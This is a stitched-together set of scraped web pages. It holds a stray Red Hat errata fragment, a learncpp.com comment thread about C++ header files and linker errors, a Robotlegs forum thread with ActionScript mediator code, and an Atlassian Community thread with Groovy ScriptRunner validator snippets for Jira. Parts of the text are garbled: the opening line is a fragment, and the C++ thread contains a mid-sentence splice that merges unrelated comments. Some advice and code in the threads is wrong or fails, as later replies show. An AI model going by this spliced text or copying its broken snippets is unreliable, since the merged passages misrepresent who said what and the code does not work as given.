2029297 - MON_DISK_LOW troubleshooting guide link when clicked, gives 404 error . - BZ - 2029409 - Update defaultReleaseImageOriginal to 4.9
https://access.redhat.com/errata/RHBA-2021:5003
CC-MAIN-2022-21
en
refinedweb
. I actually figured it out. It appears that within project explorer, you can right click the file and select properties. It's important to make sure that under the Build tab, the Debug and Release boxes are checked. Apparently, when I created the file I missed the step to check these boxes. All compiles as expected now. So, I have been messing with the CodeBlocks Editor on Gentoo and the prototype definition doesn't appear to pull in the add.cpp file. For this reason, when building, the build fails stating that add(int, int) is not defined. Now I've tried removing the header all together and place the prototype declaration directly above main.cpp and the build still fails stating that add(int, int) is not defined. I'm able to build from the command line by specifying: This process does not fail and creates the add.o executable, which runs correctly. Am I correct to assume this could be a bug in Codeblocks? So far I'm also pretty impressed with the tutorial. Thanks for your guidance Alex. I figured it out! So you need main.cpp, add.cpp and add.h all in the same folder because the main is including add.h which calls add.cpp to define what "int add()" is! Now my question is, how can you use files in different folders? I updated the lesson to include a section on how to include files from different folders. sir i want to know how to create a header file using tlib in c. Sorry, I don't know anything about tlib. Hi Alex - I'm having some issues with this - my code is identical to the website - and I have no add.cpp in this project when my code is this I get the error "add(int, int)" not defined but when I change to this it works I am guessing that this is because the header file only is added when ADD_H is included somewhere in main due to the if statements - but what happens when there is more than one function prototype in the library? I'm not sure why this is working for you. ADD_H should be meaningless. The header guard ensures that the header is not included more than once (that would lead to redefinition errors). You are allowed to have more than one function prototype in a header file. Hey Alex, thanks for the awesome tutorial, i had major problems and confusions on how to actually write the header files, but now i understand it more. :) Why actually make header files? why not just define the functions you need after main? In trivial examples like the ones we're doing right now, there's really no need for header files. However, once you get into writing more complicated things, you'll use header files everywhere. They allow you to import a set of declarations to multiple source (.cpp) files with minimal effort. An analogy might be useful here: imagine every time you wanted to use std::cout, you had to copy every thing related to std::cout into the top of your .cpp. For every .cpp file. That would get annoying, right? Isn't it much easier to just #include ? Hey Alex, these tutorials are awesome! :] I'm learning a whole lot. Thank you for making them. This is probably something really obvious, but I am really confused. I'm using Microsoft Visual C++ 2008 Edition, and when I add the add.cpp file, it automatically gives me an add.h file as well. But when I open it, in the tab it says add.h [Design] and there's just a box named add, and I can't put code anywhere. I realized that there is a seperate folder specifically for Header files, but I couldn't create an add.h file in it, because the name is already used. So I created one with a different name (with a .h extension), and it gave me a .cpp and a .h for that, too. And the .h is still a design box. I'm probably going to feel really dumb after this, but where am I suppose to put the header code? D: I have like 8 files and I only need to use three...so confusing >: Also, the .cpp files had #include "theirname.h" on the top, should I leave that there? Great tutorial and thanks for taking the time to respond to people's questions. I have one myself. I am using Code Blocks 8.02 with Ubuntu 9.04. main.cpp here is my add.cpp here is my add.h Now every time I try to build this program I get this error. any help with what I am doing wrong would be great. Thanks I don't see anything wrong with the code. Sounds like an OS-specific issue. Perhaps ask on a Ubuntu forum? For gcc compiler you may require to declare the function as extern "C" or the linker won't link it properly. Try the following header file what does "int" stand for or represent? int = integer, it is a basic numeric type with no decimals. How do i create a header in Dev C++? your help would be appreciated In order to create a header file in dev-cpp, in the upper-left corrner there is a 'new' button (button with a pic of a blank peice of paper on it), click on this. once the file is created, right click the filename in the left hand column, and select rename. Enter the new name for the file and put .h at the end of the name. This will state it as being a header file and thus cuase the linker to treat it as such. -Tyler WOW!!!!!!! Finally I get it. I had to have a add.cpp file and a main.cpp file and a add.h file! I'm sure I'll be reading all these tutorials over again because I can never understand everything the first time around even at a snails pace. Just knowing that I finally figured it out though is the best part and seeing my mistake from the last section makes it all the better. Thanks for the tutorials :-) I've gotten this far after my first day. But I'm sure I'll be reading these tutorials over and over to fully understand everything! Thanks again. It is always a good idea to go over good, rich materials twice. I believe that the things you learn later on (not specifically in this tutorial, but anything) will help you better understand the basics when you go over them again. Generally, as you build a programmer mindset and learn to think, reason and think accordingly, I believe you will also find it easier to put things into perspective, so you might finally understand basic things you never understood the first thing you saw them. excellent tutorials(thank you!) but I have 3 questions. I don't get the header file part. In the example you use add.cpp as the declaration for add(). In add.h you put in a forward declaration for add(). But why can't you define add() in the header file, isn't that more efficient since you don't need add.cpp anymore and thus less files = less work. Second question (assuming you answered my first question): You use add.cpp as a declaration file for add(), is it common to use a .cpp file with more then one declarations? Meaning multiple function declarations in one .cpp file (seems more convenient) or do you have to use multiple cpp files for multiple function declarations? My last question: Will these tutorials lead to the explaination of actually using your knowledge of c++ in developing programs? I think that's really important because: okay I learned c++, now how do I use my knowledge? Like this tutorial gives you an assignment to make a program in the end. Many thanks, keep it up! You _could_ define add() in the header file if you wanted, but this is generally not done (unless the function is trivial, like 1 or 2 statements). Header files are generally used for prototyping functions and declaring classes, and then those things are actually implemented in .cpp files. It is VERY common to have multiple functions in one .cpp file. Typically a .cpp file will contain a whole set of related function (eg. math.cpp will contain functions to do square roots, exponents, and other mathy things). To address your last question, no, not really. It's really up to you to figure out how to apply what you learn. At some point I'd love to go back and add that, but I haven't had time. :( Never mind Alex I got it. This tutorial is really really helpful. I wish we have a tutorial for java too, please tell me if you have one... Thanks again. Glad you got it working. Sorry, no Java tutorial from me since I don't know the language. Hi Alex, This tutorial is awesome and I cant believe I'm finally learning C++. I have a question. I was trying to compile the code you gave, it sounds crazy but should I add a header file in the header files folder or source files folder. Anyways I tried creating in both but none worked. I created the header file with .h extension. and the header file was I had an error: 1>------ Build started: Project: HelloWorld, Configuration: Debug Win32 ------ 1>Linking... 1>MSVCRTD.lib(crtexe.obj) : error LNK2019: unresolved external symbol _main referenced in function ___tmainCRTStartup 1>C:\Documents and Settings\sravan\My Documents\Visual Studio 2008\Projects\HelloWorld\Debug\HelloWorld.exe : fatal error LNK1120: 1 unresolved externals 1>Build log was saved at ":\Documents and Settings\sravan\My Documents\Visual Studio 2008\Projects\HelloWorld\HelloWorld\Debug\BuildLog.htm" 1>HelloWorld - 2 error(s), 0 warning(s) ========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ========== Please help I am badly stuck here. Thanks in advance. Amazing tutorials! It actually all makes sense LOL -- now do one on the economy for the new U.S. administration LOL Thank you very, very much for making these tutorials!!! Alex, is there a cd I can buy of these tutorials from you? Or a book you wrote? I would donate, but who knows, next week the website could be down :( Sorry, there is currently no offline version of the site. It's something I'd like to do but I just don't have the time to put it together right now. This website has been running since May 2007, so we've been up for over a year and a half. As long as the meager advertising revenue exceeds the cost of hosting the site, it'll probably be here. :) Header files sound really cool, because I could make a header file that had a function in it that would calculate the angle of the sun depending on the time/day of year etc, and put it on the internet for people to download :P (along with some instructions as to what functions to call in the main.cpp) I'm not advanced enough yet to calculate the angle of the sun but that would still be cool :D I understand this whole tutorial.. except I couldn't work out how to create a ".h" file :S I'm using Code::Blocks and when I create a new file it makes me save it as a ".cpp" Edit: Woooaahh nevermind, I just figured it out. :D Awesome tutorials btw :) Generally it's a better idea to define your functions in .cpp files. If you wanted, you could distribute both the .cpp (containing the code) and a .h (containing a prototype for people to #include). sorry about that last comment i figured out what i was doing wrong just as i finished posting it, i forgot to include the "using namespace std" thing. but now i have another problem: everything else comiles fine but i keep getting a linker error. it says that i have an undefined referance to add. i don't know what i'm doing wrong.i'm using the same code only i fixed the "name space" issue and filled in all the missing ;'s at the end of some of the lines. Did you actually define the add() function? If you defined it in another .cpp file (eg. add.cpp), are you sure you are compiling that .cpp file into your program? You probably need to add it to your project or compile command line. so I need my main program, a header file, and a sepreate .cpp file to define add? and how would I include the .cpp file for the add function? would I just place it affter my ADD.h header file in the "# include" list? ex. so I made a .cpp file defineing add and included it in my program ( the .cpp file defining add is the same as the one in this lesson ). but when I tryed to compile the program, it gave me an error. it was complaining about a linker error to win16 or somthing like that. to be honest, i havent got the slihtest clue what it means by win16 ( exept that I think it might have something to do the windows operating system files???). If you're using a MS compiler, on the left hand side you should see your project and a list of all the files include in it. If you right click on "Source Files" and choose "add" you can add new files or existing files to your project. That's where you need to add the file. Using #include with .cpp is almost never something you'll have need of. for some reason my compiler ( i'm useing bloodshed versoin 4.somthing )keeps saying that cout and cin are undeclared. i have wrote several programms before including fixeing Fluxx's rectangle area calculator and they all have compiled and ran smoothly up until now. i have included both iostream and my own header file ( ADD.h ).here is my code: my header file for the add function is identical to yours ( only i named the file ADD.h instead of add.h ) .i have tryed rearanging them, retyping them, even writeing a whole new program. i've been stuck on this for days and i can't see what i'm doing wrong. please help me Alex. You forgot to put a ; (semi-colon) after " enter a number to add to this: " Also the statement spell error: system ("puase") should be "pause" and need a semi-colon at the end. Aaah. Nice one. Yes that worked a charm. Thank you Alex. So the compiling syntax is: C++ mainfile.cc Inclue1.cc Include2.cc ... IncludeN.cc -o out.exe where InlcudeN are the N additional header files to be read in mainfile. Is that a generic compiling syntax, or is this just specific to Cygwin??? Thanks again! It's generic to gcc/unix style compilers as far as I know. Hey, Thoroughly enjoying this tutorial too! Also the best I've seen so far online. I'm having some trouble compiling too!! I'm using a Cygwin bash shell I have 3 programs: The first is main.cc: The next is add.cc and lastly I have add.h All files are contained in the same folder that I have been using for all my other programs. I have been compiling previous programs using c++ filename.cc -o filename.exe The error message I get reads: "MYFOLDER/cc9iZFXR.0:main.cc(.text+0x13b): undefined reference to 'add(int,int)' collect2: Id returned 1 exit status **************** If you can provide any advice here it would be greatly appreciated! Rich PS I've tried changing filename.cc to filename.cpp etc. It looks to me like the linker can't resolve the function call to add(), which means that you're probably not compiling in add.cc properly. If I remember correctly, you should be doing something like this: c++ main.cc add.cc -o out.exe thanks for your tutorials. I mean not even c++ for dummies can touch this with the way u respond. :) its helping me a great deal. Thanks for this tutorial, I have a question: I the second graphic, you showed the work of the compiler and linker with source files, Why there is not an arrow from add.cpp to add.h, since add.h is only declaration (which include function prototypes and variables) that add.cpp implemented? Thank you, Add.h would be brought in under both add.cpp and main.cpp since they both include it. I didn't show it being brought in under add.cpp for space consideration reasons. In the actual add.cpp return (x + y) was stored. In add.h this sentence is not part of the code. How does the compiler/linker know that the sum of x + y is needed as the result? Niels When main.cpp #includes add.h, the function prototype for add() is imported into main.cpp. The compiler uses this add() prototype to ensure anyone calling add() is doing so correctly. Once the compiler is satisfied no syntax or type-checking errors exist, the linker takes over. The linker's job is to combine all of the individual .cpp files into a single unit (generally an executable or DLL), and ensure that all of the function calls resolve to an actual defined function. If you forgot to include add.cpp in your project, your project would still compile okay (because the compiler could use the prototype to do type checking), but it would fail in the linker stage because the linker would be unable to resolve the call to add() to a specific function. Thanks Alex! I had this doubt while reading the tutorial. Greatly explained. Foremost, thanks a ton for such a wonderful tutorial. Hello Alex, First of all I would like to thank you very much for taking time and posting such a wonderful tutorial. You have mentioned namespaces, but coming from 'C' programming background, I never came across 'namspaces'. Can you please explain the basics and what these namespaces are? Thank you once again. Kkamudu I introduce the topic of namespaces in lesson 1.3a -- a first look at cout, cin, endl, namespaces, and using statements, and in more detail in lesson 7.11 on namespaces. Even though it's in chapter 7, any readers who are curious might have a look now -- I think it will be pretty comprehensible even with just the knowledge presented in chapter 1. i used the codes that you posted in the tuturial which are and since im using visual C++ 2008 i added #include "stdafx.h" to the top of the code but it always comes up with these errors 1>------ Build started: Project: hmmm, Configuration: Debug Win32 ------ 1>Compiling... 1>hmmm.cpp 1>c:my documentsvisual studio 2008projectshmmmhmmmhmmm.cpp(3) : fatal error C1083: Cannot open include file: 'add.h': No such file or directory 1>Build log was saved at " DocumentsVisual Studio 2008ProjectshmmmhmmmDebugBuildLog.htm" 1>hmmm - 1 error(s), 0 warning(s) ========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ========== i have no clue what im doing wrong =/ BTW so far the tuturials have been pretty good so thanks for taking your time to write it all sorry i put the code in brackets like it says but they somehow got deleted when i posted it The only thing I can think of is that maybe you didn't save add.h into the correct directory? I had the same problem till I realised that of course files are saved to the last place used so VS was saving to the mutli file project from the prior lesson. moved the .h file to the folder for this project and its ok This is a great tutorial. Thanks for the time that you put into it. I've got a question: I'm working on a dialog in a solution (in VS 2005) that contains several projects. I'm trying to access one of the classes from another project, but I keep getting a linking error. I have done a #include "headerfile.h" and have added the path to my "Additional include directories" in the properties pages via the IDE. I'm unable to copy the .h file into my local directory, because it references a resource.h file located in it's project. My dialog has a resource.h file of its own. Has anyone had a similar problem? Generally you'll get a linker error when you include all the appropriate header files but don't include the actual definition of what's in the header files. I'm guessing you need to include some of the .cpp files from the other project in the project you're getting the linker error for. Another interesting part of the tutorial. I learnt a lot about namespaces here. Thanks again for the great tutorial: } The problem Chase had here as do to the omission of the semi colon " ; " after his prototype for his header file and the reason it was fixed when he changed it was simply do to the fact that he defined it within the header itself instead of in a separate .cpp file. In other words his declaration should have looked like this in his header file: add(int x, int y); <--- notice the semi colon. When changed to: add(int x, int y) { return x + y; } It was no longer a prototype but a definition, meaning that the add.cpp file was no longer needed do to the fact that the definition is also now held in the header file. At least this is my understanding so far. Oh, and yes I know his change uses a colon instead of a semi colon, I'm just guessing that it was a typo. I had this problem too and couldn’t understand what was being wrong (I was trying out the IDE Geany). Until I realised that Geany didn’t compile both of the two .cpp files, and link them together. When I manually compiled/linked them with g++ it worked just: 'Multiply': identifier not found 1>c:\documents and settings\jstuart\my documents\visual studio 2008\projects\program1\program1\program1.cpp(19) : error C3861: 'Add': identifier not found 1>c:\documents and settings\jstuart\my documents\visual studio 2008\projects\program1\program1\program1.cpp(20) : error C3861: 'Subtract': '#include "stdafx.h"'. First of all thank you Alex for the excellent tutorials. a questions please: from jestuart's code; I thought he will at least need three files, one for the header, one for the actual function and then one for main e.g Math.h - which contains the forward declaration Math.cpp - which will contain the actual function definition main.cpp - which will reference the .h files here is my code for a similar operation; using code::block #include <iostream> #include "math.h" int main() { using namespace std; cout << "3 + 4 = " << add(3, 4) << endl; cout << "3 - 4 = " << sub(3, 4) << endl; cout << "3 * 4 = " << multiply(3, 4) << endl; return 0; } math.cpp int add( int x, int y) { return x + y; } int sub(int x, int y) { return x - y; } int multiply(int x, int y) { return x * y; } math.h #ifndef MATH_H #define MATH_H int add(int x, int y); int sub(int x, int y); int multiply(int x, int y); #endif thank you abdul for the code. i tried to run the code above, i am using codeblocks in Windows 7, but kept getting an error that says as follows: "undefined reference to `add(int, int)' "undefined reference to `sub(int, int)' "undefined reference to `multiply(int, int)' however, i was able to resolve this issue by adding this line of code inside the header file or the math.h file the following is the final code for the header (math.h) file: thank you for the nice tutorials everyone! :) It is bad form to #include .cpp files. It sounds to me like in this case, math.cpp wasn't being compiled in the project. So instead, you have main.cpp #include math.h, which #includes math.cpp. This means the code from math.h and math.cpp get inserted into main.cpp. That defeats much of the point of having separate files. The problem here seems to be that math.cpp wasn't added to the project correctly or not added at all. I ran into the same error while using command line when I did this: instead of: can you please explain that why we need to create add.h file when we have forward declaration? what is its main purpose? // This is start of the header guard. ADD_H can be any unique name. By convention, we use the name of the header file. #ifndef ADD_H #define ADD_H // This is the content of the .h file, which is where the declarations go int add(int x, int y); // function prototype for add.h -- don't forget the semicolon! // This is the end of the header guard #endif In the case where we have just one function we need to access from another file, we'd probably just use a forward declaration. But in code of sufficient complexity, we often have many related functions, all of which need forward declarations to be used, and we need to use those functions in more than one place. Header files vastly simplify that process. For example, it's much easier to say, "#include " than add individual forward declarations for functions named add, subtract, multiple, divide, square root, exponent, circumference, etc... @ALEX..Lol then we can make another cpp file(A) where all the other functions' forward declaration has been made, and forward declare (A) in the main program....Header files just make the compilation slower as each time the program compiles,all the data from the header file is simply copypasted...What is the main advantage of a header file?lol thanx This won't work -- you can't forward declare a file. That's what #includes are for. The main advantage of a header file is to import a set of declarations into any file that needs it. Header files typically contain forward declarations for functions defined in other files, as well as custom define types that need to be used (enums, classes, etc...). Gotcha By bad i mean i got it thanx Name (required) Website
https://www.learncpp.com/cpp-tutorial/header-files/comment-page-1/
CC-MAIN-2019-13
en
refinedweb
Extend Mediators (for Roland) Because the thread was closed, I am opening a new one. I've done exactly what you are attempting to do. It's very straightforward. I have an abstract WindowMediator for my Window class (which extends Sprite) and then I create concrete WindowMediators that extend WindowMediator. The abstract has a protected var window:Window and in the onRegister of the concrete mediator, I set window = the injected concrete view. public class WindowMediator extends Mediator implements IMediator { protected var window:Window; public function WindowMediator() { super(); } override public function onRegister():void { eventMap.mapListener(window, Event.CLOSE, onWindowClose, Event); eventMap.mapListener(window, Event.ACTIVATE, onWindowActivate, Event); eventMap.mapListener(window, Event.DEACTIVATE, onWindowDeactivate, Event); eventMap.mapListener(window, Event.ADDED_TO_STAGE, onAddedToStage, Event); eventMap.mapListener(window, NativeWindowBoundsEvent.RESIZE, onWindowBounds, NativeWindowBoundsEvent); eventMap.mapListener(window, NativeWindowBoundsEvent.MOVE, onWindowBounds, NativeWindowBoundsEvent); eventMap.mapListener(window, SystemControlsEvent.CLOSE_WINDOW, onSystemControlClose, SystemControlsEvent); eventMap.mapListener(window, SystemControlsEvent.MAXIMIZE_WINDOW, onSystemControlMaximize, SystemControlsEvent); eventMap.mapListener(window, SystemControlsEvent.MINIMIZE_WINDOW, onSystemControlMinimize, SystemControlsEvent); eventMap.mapListener(window, SystemControlsEvent.RESTORE_WINDOW, onSystemControlRestore, SystemControlsEvent); super.onRegister(); } protected function onAddedToStage(event:Event):void { // initialization } protected function onWindowClose(event:Event):void { var owner:Window = (window is ModalWindow) ? ModalWindow(window).owner : null; dispatch(new WindowLifeEvent(WindowLifeEvent.DESTROY, null, window.uid, owner)); } protected function onWindowActivate(event:Event):void { dispatch(new ApplicationWindowEvent(ApplicationWindowEvent.ACTIVATE, window.uid)); } protected function onWindowDeactivate(event:Event):void { dispatch(new ApplicationWindowEvent(ApplicationWindowEvent.DEACTIVATE, window.uid)); } protected function onWindowBounds(event:NativeWindowBoundsEvent):void { dispatch(new ApplicationWindowEvent(ApplicationWindowEvent.BOUNDS, window.uid, event.afterBounds)); } protected function onSystemControlClose(event:SystemControlsEvent):void { window.nativeWindow.close(); } protected function onSystemControlMaximize(event:SystemControlsEvent):void { window.nativeWindow.maximize(); } protected function onSystemControlMinimize(event:SystemControlsEvent):void { window.nativeWindow.minimize(); } protected function onSystemControlRestore(event:SystemControlsEvent):void { window.nativeWindow.restore(); } } public class PanelWindowMediator extends WindowMediator implements IMediator { [Inject] public var model:PanelModel; [Inject] public var panelWindow:PanelWindow; public function PanelWindowMediator() { super(); } override public function onRegister():void { window = panelWindow; panelWindow.panel = model.getPanel(window.uid); super.onRegister(); } override protected function onWindowClose(event:Event):void { model.closeWindow(panelWindow.panel); super.onWindowClose(event); } } Comments are currently closed for this discussion. You can start a new one. Keyboard shortcuts Generic Comment Form You can use Command ⌘ instead of Control ^ on Mac Support Staff 1 Posted by Shaun Smith on 19 Feb, 2010 09:24 AM Hi Steven, Which thread was closed? I thought that even if an issue was "resolved" it could still be re-opened by anyone adding a new comment. Also, as this thread is marked as private (I noticed that on your last thread as well) I think it's only visible to yourself and members of the Robotlegs support team (3 of us at the moment). 2 Posted by stevensacks on 11 Mar, 2010 01:14 AM I couldn't reopen it. It wouldn't let me. I didn't mean to make this private, either. Support Staff 3 Posted by Shaun Smith on 11 Mar, 2010 12:04 PM Oh no! Perhaps closing issues is a bad idea then - I assumed that anyone could re-open any issue by simply continuing the conversation. Will have to look into that. This thread is now public - not sure what's going on there either! Sorry for any hassles. 4 Posted by stevensacks on 12 Mar, 2010 01:15 AM I made it public. The mystery is solved. ;) Stray closed this discussion on 10 Feb, 2011 05:03 PM.
http://robotlegs.tenderapp.com/discussions/problems/45-extend-mediators-for-roland
CC-MAIN-2019-13
en
refinedweb
Opened 6 years ago Closed 6 years ago #19895 closed Bug (fixed) Second iteration over an invalid queryset returns an empty list instead of an exception Description As a part of #17664 it was discovered that an invalid queryset only raises exceptions during the first iteration. When iterating over the queryset again, an empty list is returned, i.e. the following test case would fail: def test_invalid_qs_list(self): qs = Article.objects.order_by('invalid_column') self.assertRaises(FieldError, list, qs) self.assertRaises(FieldError, list, qs) Attachments (3) Change History (19) comment:1 Changed 6 years ago by comment:2 Changed 6 years ago by comment:3 Changed 6 years ago by comment:4 Changed 6 years ago by As suggested by jacobkm on IRC, here's the updated patch: comment:5 Changed 6 years ago by comment:6 Changed 6 years ago by That commit is causing a serious ORM memory leak in one of my applications. It may be that my code is not the cleanest, but anyway, I consider this as a serious regression. comment:7 Changed 6 years ago by Attached is a minimalistic test case that will show the memory leak. The case is simple - have enough objects that one ITERATOR_CHUNK_SIZE will not convert all the objects (that is, more than 100 objects in the queryset). Do bool(qs). This will result in memory leak when this ticket's patch is applied, but will not leak if this ticket's patch isn't applied. The reason for the leak is a bug in Python itself. The gc.garbage docs say that: """ A list of objects which the collector found to be unreachable but could not be freed (uncollectable objects). By default, this list contains only objects with __del__() methods. Objects that have __del__() methods and are part of a reference cycle cause the entire reference cycle to be uncollectable, including objects not necessarily in the cycle but reachable only from it. ... """ However, no __del__ method is defined anywhere, so there should not be any uncollectable objects. Also, pypy collects the garbage, so this is another thing pointing to a bug in Python. I have tested this with Python 2.7.3 and Python 3.2.3, and both of those will leak. Pypy 1.8.0 collects the garbage correctly. Steps to reproduce: unpack the attachment, run tester.py, see if gc.garbage has reference to _safe_iterator. Even if this is a bug in Python this has to be fixed in Django itself. The memory leak can be bad. It seems just reverting the commit is the right fix. Interestingly enough doing this change in Query.iterator() is enough to cause leak: try: iterator() code here... except Exception: raise comment:8 Changed 6 years ago by Here is a minimalistic case showing the bug in Python: class MyObj(object): def __iter__(self): self._iter = iter(self.iterator()) return iter(self._iter) def iterator(self): try: while True: yield 1 except Exception: raise i = next(iter(MyObj())) import gc gc.collect() print(gc.garbage) comment:9 Changed 6 years ago by I filed a bug to Python bug tracker. Does anybody see any other solution than reverting the patch? comment:10 Changed 6 years ago by I think we should roll back the patch. Your queryset-iteration simplification patch will fix this bug anyway, correct? comment:11 Changed 6 years ago by The more complex version of the simplification patch has this same issue. It is likely possible to work around this issue in the patch. As for 1.5 a roll back seems like the only option. comment:12 Changed 6 years ago by comment:13 Changed 6 years ago by comment:14 Changed 6 years ago by comment:15 Changed 6 years ago by This isn't a release blocker any more, the leak is fixed, the second iteration works in the same way as before. comment:16 Changed 6 years ago by Test committed in 904084611d740e26eb3cb44af9a3d2f3a6d1b665 All the solutions I can come up with are apparently ugly. I'm attaching two versions of the patch for discussion (with tests stripped). One solution is wrapping the iterator in another method, the other is putting the required try/catch in the iterator() method itself, which pushes the indentation to six levels deep maximum.
https://code.djangoproject.com/ticket/19895
CC-MAIN-2019-13
en
refinedweb
I have apache logs that look like following. How do I process this? 10.10.6.49 - - [26/Jan/2017:17:15:25 -0800] "POST /thrift/service/MyApiService/ HTTP/1.1" 200 4605 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" Hi Dale, This is a good question! You would do this by writing an Import UDF. We have several examples of Import UDF that you can search for on this discussion group. But let me take an stab at this: Here is an example UDF code for this in python: import json import io import apache_log_parser def parseAccessLog(fullPath, inStream): line_parser = apache_log_parser.make_parser("%h %l %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"") outputStr = [] for line in inStream.readlines(): try: logData = line_parser(line) except: continue # we recommend you do some processsing here and generate an ICV row instead yield logData Notice the use of yield above. Yield is a python feature. It returns a generator which can be used by the consumer of the UDF, which in this case is the Xcalar Compute Environment (XCE). Each line maps to a dictionary instance that is then converted to a generator using yield. If you needed to test your UDF with a main driver, make sure you use a stream generator. Here is example code for this: inStream = io.open("access_log") gen = parseAccessLog("", inStream) for record in gen: print "Printing record..." for fieldName, fieldValue in record.iteritems(): print "field {}: value {}".format(fieldName, fieldValue) Once you write your UDF, you can test this using Xcalar Design (XD). Use the Point to Data source feature and make sure your browser points to the dataset which needs to be streamed. Choose the JSON format for conversion. Once you have this UDF tested in command line shell, you can paste it in the UDF editor in Xcalar and upload it. Using the Import Data Source you can perform the import. Hope this helps! Cheers,Manoj To add to Manoj's great reply, I'd like to highlight how Xcalar Design 1.3.1 streamlines the workflow for creating an Import UDF in Jupyter Notebook for a custom format data source file, like the semi-structured apache access_log @dschaefer wanted to parse. Here are the steps you'd take today: Rather than using Python through a command line shell to debug, and manually copying your UDF into place, the new process shepherds you into Jupyter and back into the process of creating a table from your data source file. Try it out, and give us your feedback. Best wishes,Mark
https://discourse.xcalar.com/t/white-check-mark-how-do-i-process-semi-structured-apache-access-log/359
CC-MAIN-2019-13
en
refinedweb
It's not the same without you Join the community to find out what other Atlassian users are discussing, debating and creating. I have been using Behaviours to make fields required on certain projects without altering the Field Configurations (which are used across many projects). It works great (create behaviour, map to particular project, and set field to required). However, I can't figure out how to do this for just one transition screen in a project. Is it possible to set a field to required for only for 1 screen in a project? I know that I can do this by adding a validator to the workflow, but I don't want to change the workflow either, as it too is used by many projects. Hi Morgan You can use getFieldScreen(), in your behaviour, in order to determine in which screen you are Hey Thanos - thanks. I just realised you may have given me this answer before! The problem is I don't know how to use 'getFieldScreen()' to do this. If it's a simple thing, could you tell me what code I can enter in? For example, if I have created a behaviour, as described above, that makes a field required for a particular project, is it just a case of clicking 'Add Serverside Script' in that behaviour and typing in 'getFieldScreen(NAMEofSCREEN) and that's it? Sorry for not being very code-savvy. Cheers, Morgan Hey Morgan So, you can associate screen with issue operations, then the getFieldScreen(), no params, will return to you the name of the screen, let's say Bug Screen, and after from the moment that you get the name of the screen you can add some logic to it (string comparisons). A 'lazy' way is to add some debugging log.debug("Name of the screen " + getFieldScreen()) and check the names of the the screen you are into. Hope that helps. Hi Thanos, I appreciate your help but I think you have over-estimated my coding skills. I'm not a coder - I administer Project Management tools here at Demonware. I understand associating screens with issue operations as that is part of JIRA's functionality. As to adding logic and string comparisons, I'm afraid I don't know about that. It would be extremely useful for me to have some code that I can add to behaviours (by clicking 'Add server-side script' I guess?) which would limit the behaviour to a named screen. Essentially what I was hoping for was some code which I can paste into 'Add Server-side script' which effectively say 'Only apply this behaviour to screen X'. To my mind the actual behaviour itself then wouldn't require any scripting as I can do that by adding the field and setting it to 'required' and mapping it to a project (as I've been doing until now). Or does adding a script over-ride all of that? I'm also not sure if what you've mentioned above should be entered in as a script, or into the 'Class or File:' and 'Method' fields. Nor do I know what I would enter into the 'Class or File:' field if that were the case. As you can see, I don't know much. Morgan Plan B, if you want to use a server side validation or the screen you use is not unique, as you already presumed, is to associate a validator for the specific transition or use SR simple scripted validator Hi again! I am familiar with validators - unfortunately I can't make changes to the workflow for this project as the workflow is shared with other projects where the field I want to make mandatory should not be mandatory. As Thanos said... if (fieldScreen.name == "Resolve Issue) { ... // do whatever behaviour you want } Thanks Jamie. It seems that I may have to go and learn Groovy, specifically for using with Scriptrunner and JIRA. Do you have any recommendation as to where a beginner with little coding experience should start? Hi... in my experience, just pick a task and go for it. But previously there have been several questions about which resources to use, eg and the SR docs. If you use a scripted validator, you can include the project you want to validate as part of the condition; that way other projects can use the same workflow without the field requirement impacting them. Something very basic such as: issue.getProjectObject().getKey() != "MYPROJECT" || cfValues['Some Custom Field'] != null Thank you Jeremy - this was just the sort of thing I was hoping for. Unfortunately, when I tried putting this code in as 'Custom Script Validator' (with the project key in place of "MYPROJECT" and the custom field name in place of "Some Custom Field") I get the error: The variable 'cfValues' is undeclared. Any idea why that would be? Not offhand, I copied that part straight out of the examples for simple scripted validators. However, I don't use those much; here is a 'regular' scripted validator that should work: import com.atlassian.jira.issue.Issue; import com.atlassian.jira.ComponentManager; import com.atlassian.jira.issue.CustomFieldManager; import com.atlassian.jira.issue.fields.CustomField; import com.atlassian.jira.project.version.Version; import com.opensymphony.workflow.InvalidInputException; ComponentManager componentManager = ComponentManager.getInstance(); CustomFieldManager customFieldManager = componentManager.getCustomFieldManager(); if(issue.getProjectObject().getKey() == "MYPROJECT") { CustomField mcf = customFieldManager.getCustomFieldObjectByName("My Custom Field"); Version mcfv = issue.getCustomFieldValue(mcf); Boolean hasCF = (mcfv != null); if (!hasCF) { invalidInputException = new InvalidInputException("\"My Custom Field\" is required for this transition."); } } Thanks again Jeremy - this gives me: ...the variable 'componentManager' is undeclared and ...cannot find matching method com.atlassian.jira.issue.fields.Customfield#isEmpty(). Please check if the declared type is right and if the method exists. I realise this isn't a forum for debugging code. Just thought I'd say what I got for anyone else viewing this. Cheers, Morgan My bad, I removed ComponentManager from my sample without paying close attention to what it was used for. I've edited the previous comment to fix that. Well that took care of the first error, but still getting: ...cannot find matching method com.atlassian.jira.issue.fields.Customfield#isEmpty(). Please check if the declared type is right and if the method exists. Sigh. Sorry, I went too fast there and forgot to fetch the custom field value from the issue when I made the code generic. What type of custom field is it, a basic string? Hey - it's a 'Version Picker (single version)' type field in this case. The name of the custom field is 'Version Introduced'. Okay, try that; I'e only ever worked with the multi-version type that returns a list, but hopefully this one will return a single Version, or "null" if not set. Well, now for the line - Version mcfv = issue.getCustomFieldValue(mcf); I'm getting: Cannot assign value of type java.lang.object to variable of type com.atalassian.jira.project.version.Version Sorry! And thank you for your help! Try changing "Version mcfv = ..." to "def mcfv = ...". Just out of curiousity, how are you debugging this? Are the exceptions showing up in logs and you are mapping them back to the source lines? That gives me a similar error. I'm just looking at the errors that show up in the custom script validator entry field. See (this site won't let me attach images for some.
https://community.atlassian.com/t5/Jira-Core-questions/How-can-I-use-an-Adaptavist-Behaviour-to-make-a-field-required/qaq-p/348162
CC-MAIN-2019-13
en
refinedweb
